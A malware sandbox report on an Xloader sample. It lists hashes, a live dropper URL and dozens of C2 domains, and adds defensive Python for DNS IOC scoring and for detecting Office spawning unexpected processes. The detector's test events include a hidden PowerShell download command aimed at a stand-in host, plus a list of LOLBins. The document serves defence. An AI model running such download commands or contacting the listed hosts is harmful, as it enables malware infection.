General
Target: 8a66b21667a04908ecafa8ac112c66588101c5e314cf32ca3b628891129635eb
Size: 698KB
Sample: 220208-cv1zvacbdq
MD5: 843aa22495480166aff7bd3795f00b7c
SHA1: 902438d24a2ebe6ec8f82df17ff0a1184d5c41ba
SHA256: 8a66b21667a04908ecafa8ac112c66588101c5e314cf32ca3b628891129635eb
SHA512: ba688f743f02b83b6f7828f20ee02a9914def4783c6b36edeb40086a1c7a616d54b03a7693d3e171489f8260ac112378dc0f8b030570302c0547c6342b2feefb
Static task: static1
Behavioral task: behavioral1 (Sample: Drawings.xlsm; Resource: win7-en-20211208)
Behavioral task: behavioral2 (Sample: Drawings.xlsm; Resource: win10v2004-en-20220112)
Behavioral task: behavioral3 (Sample: Drawings2.exe; Resource: win7-en-20211208)
Behavioral task: behavioral4 (Sample: Drawings2.exe; Resource: win10v2004-en-20220113)
Malware Config
Extracted
URL: http://cheatsheet2weightloss.com/Designs.exe
Extracted
Family: xloader
Version: 2.3
Campaign: e68n
C2:
ds3i.com
integrityconnect.info
jhpaolilo.com
aprilgraberphotography.com
globe-gist.com
blackwellheatingandcooling.com
gossgoddard.com
memoriesmade-l.com
ozsmiwd.icu
pelzerforcongress.com
infinitybytg.com
gczp22.com
logonanet.com
998899sj.com
xn--vhqqb859burbuz7jebh.com
savorysinsation.com
cumykuf.icu
ourbella.com
isurfkarma.com
thepostmail.com
charlotteexplorer.com
shopbutterfleye.com
aceitesesencialesenparaiso.com
threebearstoronto.com
survivalmistakes.com
tshirtuae.com
taimaibio.com
johnhyr.com
anthony7ap.com
meitubi.com
greencoresolutionsinc.com
j3tsurf.com
webcurepromail.online
unexpectedbeer.com
altempower.com
runitupsocks.com
polishedwithashley.com
sapanyc.com
360vacance.com
whitneywilliamsestates.com
lianhekeji.net
infinitecontent.space
nplbtc.com
startupo.xyz
strokes.guru
xx2vvs3bs.site
alwaysthomas.com
sd581.com
siamhills.com
innne.com
thelocochef.com
inspirograph.com
drluisarevalo.com
1band1sound.com
chaing-list.xyz
laohuaji.club
ldschool.net
daveropp.com
youkut.com
ketamineinfusionutah.com
fr-contacts.com
theshopifree.com
vibrabogota.com
nolanaamber.com
primeviewm.com
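The domain list above is what a practitioner would turn into network IOCs, with one caveat that matters for Xloader/Formbook: the config carries dozens of domains and most of them are decoys, so a single DNS hit on one listed domain is weak evidence, while a host that resolves the dropper URL's host or cycles through several listed domains is a much stronger signal. The following is an added example, not part of the sandbox report: it loads the extracted values (domain list truncated to a subset; use the full list in practice), runs them over constructed DNS log lines, and scores each source host with that decoy-aware logic. The log format, host addresses and thresholds are assumptions.

```python
"""Score hosts against the Xloader config extracted above (decoy-aware).

Added example; it is not part of the sandbox report. The URL, version and
domains are copied from the report (domain list truncated to a subset), the
DNS log lines are constructed, and the confidence thresholds are an assumption.
"""
from collections import defaultdict
from urllib.parse import urlsplit

DROPPER_URL = "http://cheatsheet2weightloss.com/Designs.exe"
DROPPER_HOST = urlsplit(DROPPER_URL).hostname

# Subset of the "xloader 2.3 / e68n" domain list from the report; load all of
# them in practice. Most entries in an Xloader/Formbook config are decoys.
XLOADER_DOMAINS = {
    "ds3i.com", "integrityconnect.info", "jhpaolilo.com",
    "aprilgraberphotography.com", "globe-gist.com", "thepostmail.com",
    "charlotteexplorer.com", "primeviewm.com",
}


def normalize(name):
    return name.lower().rstrip(".")


def matched_ioc(qname, iocs):
    """Return the IOC domain that qname equals or is a subdomain of, else None."""
    q = normalize(qname)
    for d in iocs:
        if q == d or q.endswith("." + d):
            return d
    return None


def parse_dns_line(line):
    """Constructed log format: '<iso-time> <src_ip> <query-name>'."""
    ts, src, qname = line.split()
    return ts, src, qname


def assess(lines):
    seen = defaultdict(set)   # src_ip -> config domains it queried
    fetched = set()           # src_ips that resolved the dropper host
    for line in lines:
        _, src, qname = parse_dns_line(line)
        if matched_ioc(qname, {DROPPER_HOST}):
            fetched.add(src)
        d = matched_ioc(qname, XLOADER_DOMAINS)
        if d:
            seen[src].add(d)

    findings = {}
    for src in set(seen) | fetched:
        n = len(seen[src])
        if src in fetched or n >= 3:
            conf = "high"     # dropper host, or beaconing across several listed domains
        elif n == 2:
            conf = "medium"
        else:
            conf = "low"      # one listed domain alone is usually a decoy or coincidence
        findings[src] = {"confidence": conf, "domains": sorted(seen[src]),
                         "fetched_dropper": src in fetched}
    return findings


# Constructed DNS log: one infected-looking host, one single decoy hit, one clean host.
SAMPLE_DNS_LOG = [
    "2022-02-08T09:00:01Z 10.0.0.5 cheatsheet2weightloss.com",
    "2022-02-08T09:00:09Z 10.0.0.5 ds3i.com",
    "2022-02-08T09:00:14Z 10.0.0.5 www.integrityconnect.info",
    "2022-02-08T09:00:20Z 10.0.0.5 jhpaolilo.com",
    "2022-02-08T09:01:02Z 10.0.0.9 thepostmail.com",
    "2022-02-08T09:01:30Z 10.0.0.12 www.google.com",
]

if __name__ == "__main__":
    for src, finding in sorted(assess(SAMPLE_DNS_LOG).items()):
        print(src, finding)
```

Suffix matching is deliberate: Xloader beacons to paths under the listed domains, and the query may carry a subdomain. Treat the "low" findings as candidates for a second look rather than as confirmed infections; several of the listed domains are ordinary sites that users may visit legitimately.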
Targets
Target: Drawings.xlsm
Size: 147KB
MD5: 78a966dd22bc2e85d2f807e2575ea471
SHA1: 7daac212c4080fc4c6abc01f515c7548be710d54
SHA256: a2e56ee7abc330ee99d988aee0c118f06003cd7062c3a68bedec7faa59f41f55
SHA512: d945df1e709e95253a58242ac5b85f2b260c03f005aa1fbc97c01699bac33d5b87190c25ebed57bb2870b0ec91e8e09437d5a7f3e7aa2621e670856e7b07bd2c
Score: 10/10
Signatures:
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
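The "unexpected child process" signature is the single most useful host-side detection for this kind of maldoc, and it is cheap to reproduce on endpoint telemetry. The following is an added example rather than the sandbox's own signature logic: it takes process-creation events in the shape of Sysmon Event ID 1 fields, flags any Office application spawning a child outside a small expected set, and raises severity when the child is a scripting host or lives in a user-writable directory. The events are constructed; the file paths, PIDs and command lines are assumptions chosen to mirror the chain in this report (EXCEL.EXE opening Drawings.xlsm and then launching the downloaded executable), not values taken from it.

```python
"""Flag Office applications spawning unexpected child processes.

Added example; it is not the sandbox's own signature logic. The events below
are constructed in the shape of Sysmon Event ID 1 fields; the paths, PIDs and
command lines are assumptions that mirror the report's chain of EXCEL.EXE
launching a downloaded executable.
"""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Children Office launches in normal use: print spooler shim, crash reporter, Office itself.
EXPECTED_CHILDREN = OFFICE_APPS | {"splwow64.exe", "dw20.exe", "werfault.exe"}
# Interpreters and LOLBins a macro typically uses to fetch or run a payload.
LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# Directories a macro can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\", re.I)


def image_name(path):
    return ntpath.basename(path).lower()


def classify(event):
    """Return a finding dict for an unexpected Office child process, or None."""
    parent, child = image_name(event["ParentImage"]), image_name(event["Image"])
    if parent not in OFFICE_APPS or child in EXPECTED_CHILDREN:
        return None
    reasons = ["office-app-spawned-child"]
    if child in LOLBINS:
        reasons.append("lolbin-child")
    if USER_WRITABLE.search(event["Image"]):
        reasons.append("child-in-user-writable-path")
    return {"pid": event["ProcessId"], "parent": parent, "child": child,
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons, "cmdline": event.get("CommandLine", "")}


def scan(events):
    return [f for f in map(classify, events) if f]


OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"

# Constructed events: benign Office start, benign print helper, a dropped
# executable launched from Temp (the report's pattern), and a macro-to-PowerShell chain.
SAMPLE_EVENTS = [
    {"ProcessId": 3012, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": OFFICE_DIR + r"\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\user\Downloads\Drawings.xlsm'},
    {"ProcessId": 3120, "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 8192"},
    {"ProcessId": 3344, "ParentImage": OFFICE_DIR + r"\EXCEL.EXE",
     "Image": r"C:\Users\user\AppData\Local\Temp\Designs.exe",
     "CommandLine": r"C:\Users\user\AppData\Local\Temp\Designs.exe"},
    {"ProcessId": 3500, "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c iwr http://example.invalid/x.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["parent"], "->", finding["child"], finding["reasons"])
```

Tune the expected-children set to your estate before deploying; add-ins and document-management integrations add legitimate children, and every entry you add there is a blind spot, so prefer allowlisting by full path rather than by image name where you can.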
Target: Drawings2.exe
Size: 885KB
MD5: e8fa281769eebdc238ff7996041239a8
SHA1: 603e4ccf3f9fb75ece2008fcfb39214fd4c43e02
SHA256: f0898da54ae0f11c2769f71e20969563bc58e74bb1594869108b8242a9c2419b
SHA512: 74fc4926649b2ec0cdbab0c7e8c3c7c59fc75a4a820d9309b5358aee040c891a0e2c2ac5ceb3109eee2e4a9a0ca3dfa4d62f48746973e089595c1d08a782bfef
Signatures:
CustAttr .NET packer
Detects CustAttr .NET packer in memory.
Xloader Payload
Deletes itself
Suspicious use of SetThreadContext
SetThreadContext on another process's thread is the usual mechanism of process hollowing and thread hijacking: the thread's context is rewritten so that execution resumes in injected code.